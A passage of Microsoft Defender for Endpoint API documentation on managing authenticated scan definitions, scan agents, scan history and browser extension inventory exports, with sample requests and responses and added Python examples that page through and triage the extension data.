    "id": "0335a792-18d2-424b-aeed-559567054570_eb663a27ae9d032f61bc268a79eedf14c4b90f77",
    "machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
    "machineName": "DESKTOP-TEST",
    "lastSeen": "2023-01-04T09:40:03.2787058Z",
    "assignedApplicationId": "ae4a5cde-b4a1-4b76-8635-458b2cf15752",
    "scannerSoftwareVersion": "7.6.0.0",
    "lastCommandExecutionTimestamp": "2023-01-04T09:33:16Z",
    "mdeClientVersion": "10.8295.22621.1010"
  },
  "latestScan": {
    "status": null,
    "failureReason": null,
    "executionDateTime": null
  }
}

Example request to update a scan
Here's an example of a request that updates a scan.

HTTP

PATCH https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/289224fb-1686-472c-9751-5555960854ca

JSON

{
"scanName": "Test Update Windows scan",
"isActive": false,
"target": "127.0.0.2,127.0.0.3",
"intervalInHours": 1,
"targetType": "Ip",
"scanAuthenticationParams": {
"@odata.type": "#microsoft.windowsDefenderATP.api.WindowsAuthParams",
"type": "Kerberos",
"username": "username",
"domain": "password",
"isGmsaUser": true
}
}

Response example
Here's an example of the response.

JSON

{
"@odata.context":
"https://localhost:1059/api/$metadata#DeviceAuthenticatedScanDefinitions/$en
tity",
"id": "289224fb-1686-472c-9751-5555960854ca",
"scanType": "Windows",
"scanName": "Test Update Windows scan",
"isActive": false,
"target": "127.0.0.2,127.0.0.3",
"orgId": "0335a792-18d2-424b-aeed-559567054570",
"intervalInHours": 1,
"createdBy": "userName@microsoft.com",
"targetType": "Ip",
"scanAuthenticationParams": null,
"scannerAgent": {
"id": "0335a792-18d2-424b-aeed-
559567054570_eb663a27ae9d032f61bc268a79eedf14c4b90f77",
"machineId": "eb663a27ae9d032f61bc268a79eedf14c4b90f77",
"machineName": "DESKTOP-TEST",
"lastSeen": "2023-01-04T09:40:03.2787058Z",
"assignedApplicationId": "ae4a5cde-b4a1-4b76-8635-458b2cf15752",
"scannerSoftwareVersion": "7.6.0.0",
"lastCommandExecutionTimestamp": "2023-01-04T09:33:16Z",
"mdeClientVersion": "10.8295.22621.1010"
},
"latestScan": {
"status": null,
"failureReason": null,
"executionDateTime": null
}
}

Example request to delete scans
Here's an example of a request that deletes scans.

HTTP

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/BatchDelete

JSON

{
"ScanDefinitionIds": ["td32f17af-5cc2-4e4e-964a-4c4ef7d216e2", "ab32g20af-
5dd2-4a5e-954a-4c4ef7d216e2"],
}


Get all scan agents
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Find out how to sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a list of all scan agents.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

| Permission type | Permission | Permission display name |
| --- | --- | --- |
| Application | Machine.Read.All | Read all scan information. |
| Delegated (work or school account) | Machine.Read.All | Read all scan information. |

Note

When obtaining a token using user credentials:

To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (see Create and manage roles for more information).

HTTP request
HTTP

GET /api/DeviceAuthenticatedScanAgents

Request headers

| Name | Type | Description |
| --- | --- | --- |
| Authorization | String | Bearer {token}. Required. |


Request body
Empty

Response
If successful, this method returns 200 - OK response code with a list of authenticated
scan agents.

Example

Request example
Here is an example of the request.

HTTP

GET https://api-us.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents

Response example
Here is an example of the response.

JSON

{
  "@odata.context": "https://api-us.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanAgents",
  "value": [
    {
      "id": "47df41a0c-asad-4fd6d3-bbea-a93dbc0bfcaa_4edd75b2407a5b64d704b4e53d74f15",
      "machineId": "4ejh675b240118fbehiuiy5b64d704b4e53d15",
      "lastSeen": "2022-05-08T12:18:41.538203Z",
      "computerDnsName": "TEST_DOMAIN",
      "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
      "ScannerSoftwareVersion": "7.1.1",
      "LastCommandExecutionTimestamp": "2022-05-08T12:18:41.538203Z",
      "mdeClientVersion": "10.8295.22621.1195"
    },
    {
      "id": "47d41a0c-1dfd-46d3-bbea-a93dbc0bfcaa_eb663a27ae9d032f61bc268oiu4c4b90f77",
      "machineId": "eb663a27ae9d032sdf9dfd79eedf14c4b90f77",
      "lastSeen": "2022-12-19T20:29:04.8242449Z",
      "computerDnsName": "TEST_DOMAIN2",
      "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
      "ScannerSoftwareVersion": "7.1.1",
      "LastCommandExecutionTimestamp": "2022-12-19T20:29:04.8242449Z",
      "mdeClientVersion": "10.8295.22621.1010"
    }
  ]
}


Get scan agent ID
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Find out how to sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the details for a specified agent by its ID.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

| Permission type | Permission | Permission display name |
| --- | --- | --- |
| Application | Machine.Read.All | Read all scan information. |
| Delegated (work or school account) | Machine.Read.All | Read all scan information. |

Note

When obtaining a token using user credentials:

To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (see Create and manage roles for more information).

HTTP request
HTTP

GET /api/DeviceAuthenticatedScanAgents

Request headers

| Name | Type | Description |
| --- | --- | --- |
| Authorization | String | Bearer {token}. Required. |


Request body
Empty

Response
If successful, this method returns 200 - OK response code with the details of the
specified agent.

Example request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanAgents/7f3d76a6976818553e996875dc91f55df6b26625

Response example
JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAuthenticatedScanAgents/$entity",
  "value": [
    {
      "id": "47df41a0c-asad-4fd6d3-bbea-a93dbc0bfcaa_4edd75b2407a5b64d704b4e53d74f15",
      "machineId": "4ejh675b240118fbehiuiy5b64d704b4e53d15",
      "lastSeen": "2022-05-08T12:18:41.538203Z",
      "computerDnsName": "TEST_DOMAIN",
      "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
      "ScannerSoftwareVersion": "7.1.1",
      "LastCommandExecutionTimestamp": "2022-05-08T12:18:41.538203Z",
      "mdeClientVersion": "10.8295.22621.1195"
    }
  ]
}


Get scan history by definition
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Find out how to sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a list of the scan history by definitions.

Supports OData operations.

OData supported operators:
$top with max value of 4096. Returns the number of sessions specified in the request.
$skip with a default value of 0. Skips the number of sessions specified in the request.

For an example of OData operation usage, see example $top request.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

| Permission type | Permission | Permission display name |
| --- | --- | --- |
| Application | Machine.Read.All | Read all scan information. |
| Delegated (work or school account) | Machine.Read.All | Read all scan information. |

Note

When obtaining a token using user credentials:

To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (see Create and manage roles for more information).

HTTP request
HTTP

POST api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId

Request headers

| Name | Type | Description |
| --- | --- | --- |
| Authorization | String | Bearer {token}. Required. |
| Content-Type | string | application/json. Required. |

Request body
In the request body, supply a JSON object with the following parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| ScanDefinitionIds | String | The scan Id. Required. |

Response
If successful, this method returns 200 - OK response code with a list of the scan history
by definition.

Example request
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId

JSON

{
  "ScanDefinitionIds": ["4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae", "60c4aa57-c573-4488-8d18-230914792a92", "c6220f67-2cad-4ba3-a2fa-7ded6384da56"]
}

Response example
JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId",
  "value": [
    {
      "ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
      "LastScanned": "2022-12-20T11:14:24.5561791Z",
      "ScanStatus": "Partial Success",
      "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
    },
    {
      "ScanDefinitionIds": "60c4aa57-c573-4488-8d18-230914792a92",
      "LastScanned": "2022-11-17T15:13:24.5561791Z",
      "ScanStatus": "Partial Success",
      "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
    },
    {
      "ScanDefinitionIds": "c6220f67-2cad-4ba3-a2fa-7ded6384da56",
      "LastScanned": "2022-11-10T18:15:24.5561791Z",
      "ScanStatus": "Partial Success",
      "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
    }
  ]
}

Example $top request
Here's an example of a request that returns only 1 session.

HTTP

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId?$top=1

$top Response example
JSON

{
  "@odata.context": "https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId",
  "value": [
    {
      "ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
      "LastScanned": "2022-12-20T11:14:24.5561791Z",
      "ScanStatus": "Partial Success",
      "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
    }
  ]
}



Get scan history by session
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use the server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a list of the scan history by session.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

| Permission type | Permission | Permission display name |
| --- | --- | --- |
| Application | Machine.Read.All | Read all scan information. |
| Delegated (work or school account) | Machine.Read.All | Read all scan information. |

Note

When obtaining a token using user credentials:

To view data the user needs to have at least the following role permission: ViewData or TvmViewData. For more information, see Create and manage roles.

HTTP request
HTTP

POST /api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId

Request headers

| Name | Type | Description |
| --- | --- | --- |
| Authorization | string | Bearer {token}. Required. |
| Content-Type | string | application/json. Required. |

Request body
In the request body, supply a JSON object with the following parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| SessionIds | String | The session Id. Required. |

Response
If successful, this method returns 200 - OK response code with a list of the scan history
for a session.

Example request
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId

JSON

{
"SessionIds": ["01decc497f4b4ec49a5fc4e12597f8c8"]
}

Response example
JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId",
    "value": [
        {
            "orgId": "asdf781a0c-792d-46d3-bbea-a93dbc0bfcaa",
            "ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
            "SessionIds": "01decc497f4b4ec49a5fc4e12597f8c8",
            "NumberOfSuccessfullyScannedTargets": 3,
            "NumberOfTargets": 3,
            "ScanStatus": "Success",
            "LastScanned": "2022-12-19T15:14:24.5561791Z",
            "ListScannedTargets": [
                {
                    "Ip": "127.0.0.1",
                    "Hostname": "DESKTOP-Test",
                    "ScannedDeviceDescription": "Network device",
                    "ErrorMessage": "",
                    "ScanStatus": "Success",
                    "ScanDuration": "00:08:30"
                },
                {
                    "Ip": "127.0.0.2",
                    "Hostname": "DESKTOP-Test2",
                    "ScannedDeviceDescription": "Network device 2",
                    "ErrorMessage": "",
                    "ScanStatus": "Success",
                    "ScanDuration": "00:08:00"
                },
                {
                    "Ip": "127.0.0.3",
                    "Hostname": "DESKTOP-Test3",
                    "ScannedDeviceDescription": "Network device 3",
                    "ErrorMessage": "",
                    "ScanStatus": "Success",
                    "ScanDuration": "00:08:50"
                }
            ]
        }
    ]
}

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Export browser extensions assessment per device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

Returns all known installed browser extensions and their details for all devices, on a
per-device basis.

Different API calls get different types of data. Because the amount of data can be large,
there are two ways it can be retrieved:

Export browser extensions assessment (JSON response): The API pulls all data in your
organization as JSON responses. This method is best for small organizations with fewer
than 100,000 devices. The response is paginated, so you can use the @odata.nextLink
field from the response to fetch the next results.

Export browser extensions assessment (via files): This API solution enables pulling
larger amounts of data faster and more reliably, so it's recommended for large
organizations with more than 100,000 devices. This API pulls all data in your
organization as download files. The response contains URLs to download all the data
from Azure Storage. This API enables you to download all your data from Azure Storage
as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you like.

Data that is collected (using either the JSON response or files) is the current snapshot of
the current state. It doesn't contain historic data. To collect historic data, customers must
save the data in their own data storage.

Note

Unless indicated otherwise, all export assessment methods listed are full export
and by device (also referred to as per device).

1. Export browser extensions assessment (JSON response)

1.1 API method description

This API response contains all the data for installed browser extensions per device.
Returns a table with an entry for every unique combination of DeviceId, BrowserName,
ExtensionId.

1.1.1 Limitations

Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1,000 calls per hour.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

1.3 URL
HTTP
GET /api/Machines/BrowserExtensionsInventoryByMachine

1.4 Parameters
pageSize (default = 50,000): Number of results in the response.
$top: Number of results to return (doesn't return @odata.nextLink and therefore
doesn't pull all the data).

1.5 Properties

Note

Each record is approximately 0.5 KB of data. Take this into account when choosing
the pageSize parameter that is right for you.
The properties defined in the following table are listed alphabetically, by
property ID. When running this API, the resulting output will not necessarily
be returned in the same order listed in this table.
Some additional columns might be returned in the response. These columns
are temporary and might be removed; use only the documented columns.

Property (ID) | Data type | Description
BrowserName | string | Name of the browser where the extension is installed.
DeviceId | string | Unique identifier for the device.
DeviceName | string | Fully qualified domain name (FQDN) of the device.
ExtensionDescription | string | Description of a specific browser extension.
ExtensionId | string | Unique identifier for a specific browser extension.
ExtensionName | string | Name of a specific browser extension.
ExtensionRisk | string | The highest risk level generated by the browser extension. Possible values are: "None", "Low", "Medium", "High", "Critical".
ExtensionVersion | string | Version number of a specific browser extension.
IsActivated | Boolean | Indicates whether a browser extension is active.
RbacGroupId | integer | The role-based access control (RBAC) group ID.
RbacGroupName | string | The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
InstallationTime | string | The time the browser extension was installed.
Permissions | Array[string] | The set of permissions requested by a specific browser extension.

1.6 Examples

1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/Machines/BrowserExtensionsInventoryByMachine?pageSize=5&sinceTime=2021-05-19T18%3A35%3A49.924Z

1.6.2 Response example

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(contoso.windowsDefenderATP.api.AssetSoftware)",
    "value": [
        {
            "DeviceId": "1c32162b42e9efa1f5de42f951775f22f435c997",
            "DeviceName": "computerpii_1363c2e016e2225cb03974df58f14e6968067aa8.domainpii_f260e982985f7e8eee198b4332e0ae5b2a069cd6.corp.microsoft.com",
            "RbacGroupId": 86,
            "RbacGroupName": "UnassignedGroup",
            "InstallationTime": "2022-05-26T18:46:27.000Z",
            "BrowserName": "chrome",
            "ExtensionId": "dkpejdfnpdkhifgbancbammdijojoffk",
            "ExtensionName": "Logitech Smooth Scrolling",
            "ExtensionDescription": "Buttery-smooth scrolling for Logitech mice and touchpads.",
            "ExtensionVersion": "6.65.62",
            "ExtensionRisk": "High",
            "IsActivated": true,
            "Permissions": [
                {
                    "Id": "tabs",
                    "IsRequired": true,
                    "Risk": "High"
                },
                {
                    "Id": "http://*/*",
                    "IsRequired": true,
                    "Risk": "High"
                },
                {
                    "Id": "https://*/*",
                    "IsRequired": true,
                    "Risk": "High"
                }
            ]
        }
    ],
    "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/Machines/BrowserExtensionsInventoryByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0yNS8wMjAwLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}
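The paginated JSON export described above, as an added example (not Microsoft's code): it follows @odata.nextLink until a page omits it, then flags extensions at or above a chosen ExtensionRisk and calls out host permissions such as http://*/* that reach every site. The fetch stand-in, the sample pages and their records are constructed here.

```python
"""Walk the paginated BrowserExtensionsInventoryByMachine response and triage
the records. Added example; fetch_sample and SAMPLE_PAGES are constructed
stand-ins for the authenticated HTTPS calls."""
from typing import Callable, Dict, Iterator, List

BASE = ("https://api.securitycenter.microsoft.com/api/Machines/"
        "BrowserExtensionsInventoryByMachine")
RISK_ORDER = {"None": 0, "Low": 1, "Medium": 2, "High": 3, "Critical": 4}
# Host permissions that grant the extension access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Constructed sample pages keyed by request URL. The first page carries
# @odata.nextLink; the last page omits it, which terminates the walk.
SAMPLE_PAGES: Dict[str, dict] = {
    f"{BASE}?pageSize=2": {
        "value": [
            {"DeviceId": "dev-1", "DeviceName": "host1.corp.example", "BrowserName": "chrome",
             "ExtensionId": "aaaa", "ExtensionName": "Ext A", "ExtensionVersion": "1.0",
             "ExtensionRisk": "High", "IsActivated": True, "RbacGroupName": "Finance",
             "Permissions": [{"Id": "tabs", "IsRequired": True, "Risk": "High"},
                             {"Id": "https://*/*", "IsRequired": True, "Risk": "High"}]},
            {"DeviceId": "dev-1", "DeviceName": "host1.corp.example", "BrowserName": "edge",
             "ExtensionId": "bbbb", "ExtensionName": "Ext B", "ExtensionVersion": "2.3",
             "ExtensionRisk": "Low", "IsActivated": True, "RbacGroupName": "Finance",
             "Permissions": [{"Id": "storage", "IsRequired": True, "Risk": "Low"}]},
        ],
        "@odata.nextLink": f"{BASE}?pageSize=2&$skiptoken=PAGE2",
    },
    f"{BASE}?pageSize=2&$skiptoken=PAGE2": {
        "value": [
            {"DeviceId": "dev-2", "DeviceName": "host2.corp.example", "BrowserName": "chrome",
             "ExtensionId": "cccc", "ExtensionName": "Ext C", "ExtensionVersion": "0.9",
             "ExtensionRisk": "Critical", "IsActivated": False, "RbacGroupName": "Unassigned",
             "Permissions": [{"Id": "<all_urls>", "IsRequired": True, "Risk": "High"},
                             {"Id": "webRequest", "IsRequired": True, "Risk": "High"}]},
        ],
    },
}


def fetch_sample(url: str) -> dict:
    """Stand-in for an authenticated GET; a real client adds the Bearer token."""
    return SAMPLE_PAGES[url]


def iter_records(first_url: str, fetch: Callable[[str], dict],
                 max_pages: int = 10000) -> Iterator[dict]:
    """Yield every record, following @odata.nextLink until a page omits it.
    The seen-set guards against a malformed link pointing back at an earlier page."""
    url, seen = first_url, set()
    while url and url not in seen and len(seen) < max_pages:
        seen.add(url)
        page = fetch(url)
        yield from page.get("value", [])
        url = page.get("@odata.nextLink")


def broad_host_permissions(record: dict) -> List[str]:
    """Permission Ids on the record that match every http(s) origin."""
    return [p["Id"] for p in record.get("Permissions", []) if p.get("Id") in BROAD_HOSTS]


def triage(records: List[dict], min_risk: str = "High") -> List[dict]:
    """Findings for extensions at or above min_risk, worst risk first."""
    threshold = RISK_ORDER[min_risk]
    findings = []
    for r in records:
        risk = r.get("ExtensionRisk", "None")
        if RISK_ORDER.get(risk, 0) < threshold:
            continue
        findings.append({
            "DeviceName": r["DeviceName"], "BrowserName": r["BrowserName"],
            "ExtensionId": r["ExtensionId"], "ExtensionName": r.get("ExtensionName"),
            "ExtensionRisk": risk, "IsActivated": r.get("IsActivated"),
            "RbacGroupName": r.get("RbacGroupName"),
            "BroadHostAccess": broad_host_permissions(r),
        })
    findings.sort(key=lambda f: (-RISK_ORDER[f["ExtensionRisk"]], f["DeviceName"]))
    return findings


def devices_per_extension(records: List[dict]) -> Dict[str, int]:
    """Distinct devices carrying each ExtensionId (the blast radius of one extension)."""
    seen: Dict[str, set] = {}
    for r in records:
        seen.setdefault(r["ExtensionId"], set()).add(r["DeviceId"])
    return {ext: len(devs) for ext, devs in seen.items()}


if __name__ == "__main__":
    for finding in triage(list(iter_records(f"{BASE}?pageSize=2", fetch_sample))):
        print(finding)
```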

2. Export browser extension assessment (via files)

2.1 API method description

This API response contains all the data for installed browser extensions per device.
Returns a table with an entry for every unique combination of DeviceId, BrowserName,
ExtensionId.

2.1.1 Limitations

Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

2.3 URL
HTTP

GET /api/machines/browserextensionsinventoryExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for
(Maximum 24 hours)

2.5 Properties

Note

The files are gzip compressed and in multiline JSON format.
The download URLs are only valid for 3 hours. Otherwise you can use the parameter
described in section 2.4.
For maximum download speed of your data, make sure you are downloading from the
same Azure region that your data resides in.

Property (ID) | Data type | Description | Example of a returned value
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization | ["Https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
GeneratedTime | string | The time that the export was generated. | 2021-05-20T08:00:00Z

2.6 Examples

2.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/browserextensionsinventoryExport

2.6.2 Response example

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
    "exportFiles": [
        "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
        "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
        "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/BrowserExtensions/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
    ],
    "generatedTime": "2021-01-11T11:01:00Z"
}
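The file-based export (sections 2.4 to 2.6) as an added example, not Microsoft's code: it reads the `se` expiry embedded in each SAS download URL so expired links are reported instead of downloaded, checks the age of the snapshot from generatedTime, and parses the gzip-compressed multiline JSON files. The export response, blob contents and download function are constructed stand-ins for the real Azure Storage calls; the same file format is described for the antivirus health export later on this page.

```python
"""Consume a browserextensionsinventoryExport response offline. Added example;
URLs, blob contents and download_sample are constructed stand-ins."""
import gzip
import io
import json
from datetime import datetime, timezone
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Constructed URLs in the shape the API returns (SAS query string with an `se`
# expiry). The signature is a placeholder, not a real SAS token.
BLOB = ("https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/"
        "BrowserExtensions/json/OrgId=EXAMPLE-ORG")
URL_A = (f"{BLOB}/part-00393.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z"
         "&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=PLACEHOLDER")
URL_B = (f"{BLOB}/part-00394.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z"
         "&se=2021-01-11T13%3A30%3A00Z&sr=b&sp=r&sig=PLACEHOLDER")
SAMPLE_EXPORT = {"exportFiles": [URL_A, URL_B], "generatedTime": "2021-01-11T11:01:00Z"}


def parse_utc(ts: str) -> datetime:
    """Timestamps on this API look like 2021-01-11T11:01:00Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def sas_expiry(url: str) -> Optional[datetime]:
    """Expiry (`se`) of the SAS token in a download URL, or None if it has none."""
    se = parse_qs(urlparse(url).query).get("se")
    return parse_utc(se[0]) if se else None


def partition_urls(export: dict, now: datetime) -> Tuple[List[str], List[str]]:
    """Split exportFiles into still-usable and expired URLs as of `now`."""
    usable, expired = [], []
    for url in export["exportFiles"]:
        exp = sas_expiry(url)
        (usable if exp is not None and exp > now else expired).append(url)
    return usable, expired


def snapshot_age_hours(export: dict, now: datetime) -> float:
    """The export holds no history, so an old generatedTime means stale data."""
    return (now - parse_utc(export["generatedTime"])).total_seconds() / 3600


def parse_export_file(blob: bytes) -> List[dict]:
    """Files are gzip compressed with one JSON object per line (multiline JSON)."""
    records = []
    with gzip.GzipFile(fileobj=io.BytesIO(blob)) as fh:
        for raw in fh:
            line = raw.decode("utf-8").strip()
            if line:
                records.append(json.loads(line))
    return records


def make_export_file(records: List[dict]) -> bytes:
    """Build a constructed file in the same gzip + one-object-per-line layout."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as gz:
        for rec in records:
            gz.write((json.dumps(rec) + "\n").encode("utf-8"))
    return buf.getvalue()


# Constructed blob contents keyed by URL, standing in for Azure Storage.
SAMPLE_BLOBS: Dict[str, bytes] = {
    URL_A: make_export_file([
        {"DeviceId": "dev-1", "BrowserName": "chrome", "ExtensionId": "aaaa", "ExtensionRisk": "High"},
        {"DeviceId": "dev-1", "BrowserName": "edge", "ExtensionId": "bbbb", "ExtensionRisk": "Low"},
    ]),
    URL_B: make_export_file([
        {"DeviceId": "dev-2", "BrowserName": "chrome", "ExtensionId": "cccc", "ExtensionRisk": "Critical"},
    ]),
}


def download_sample(url: str) -> bytes:
    return SAMPLE_BLOBS[url]


def collect(export: dict, now: datetime, download: Callable[[str], bytes]) -> dict:
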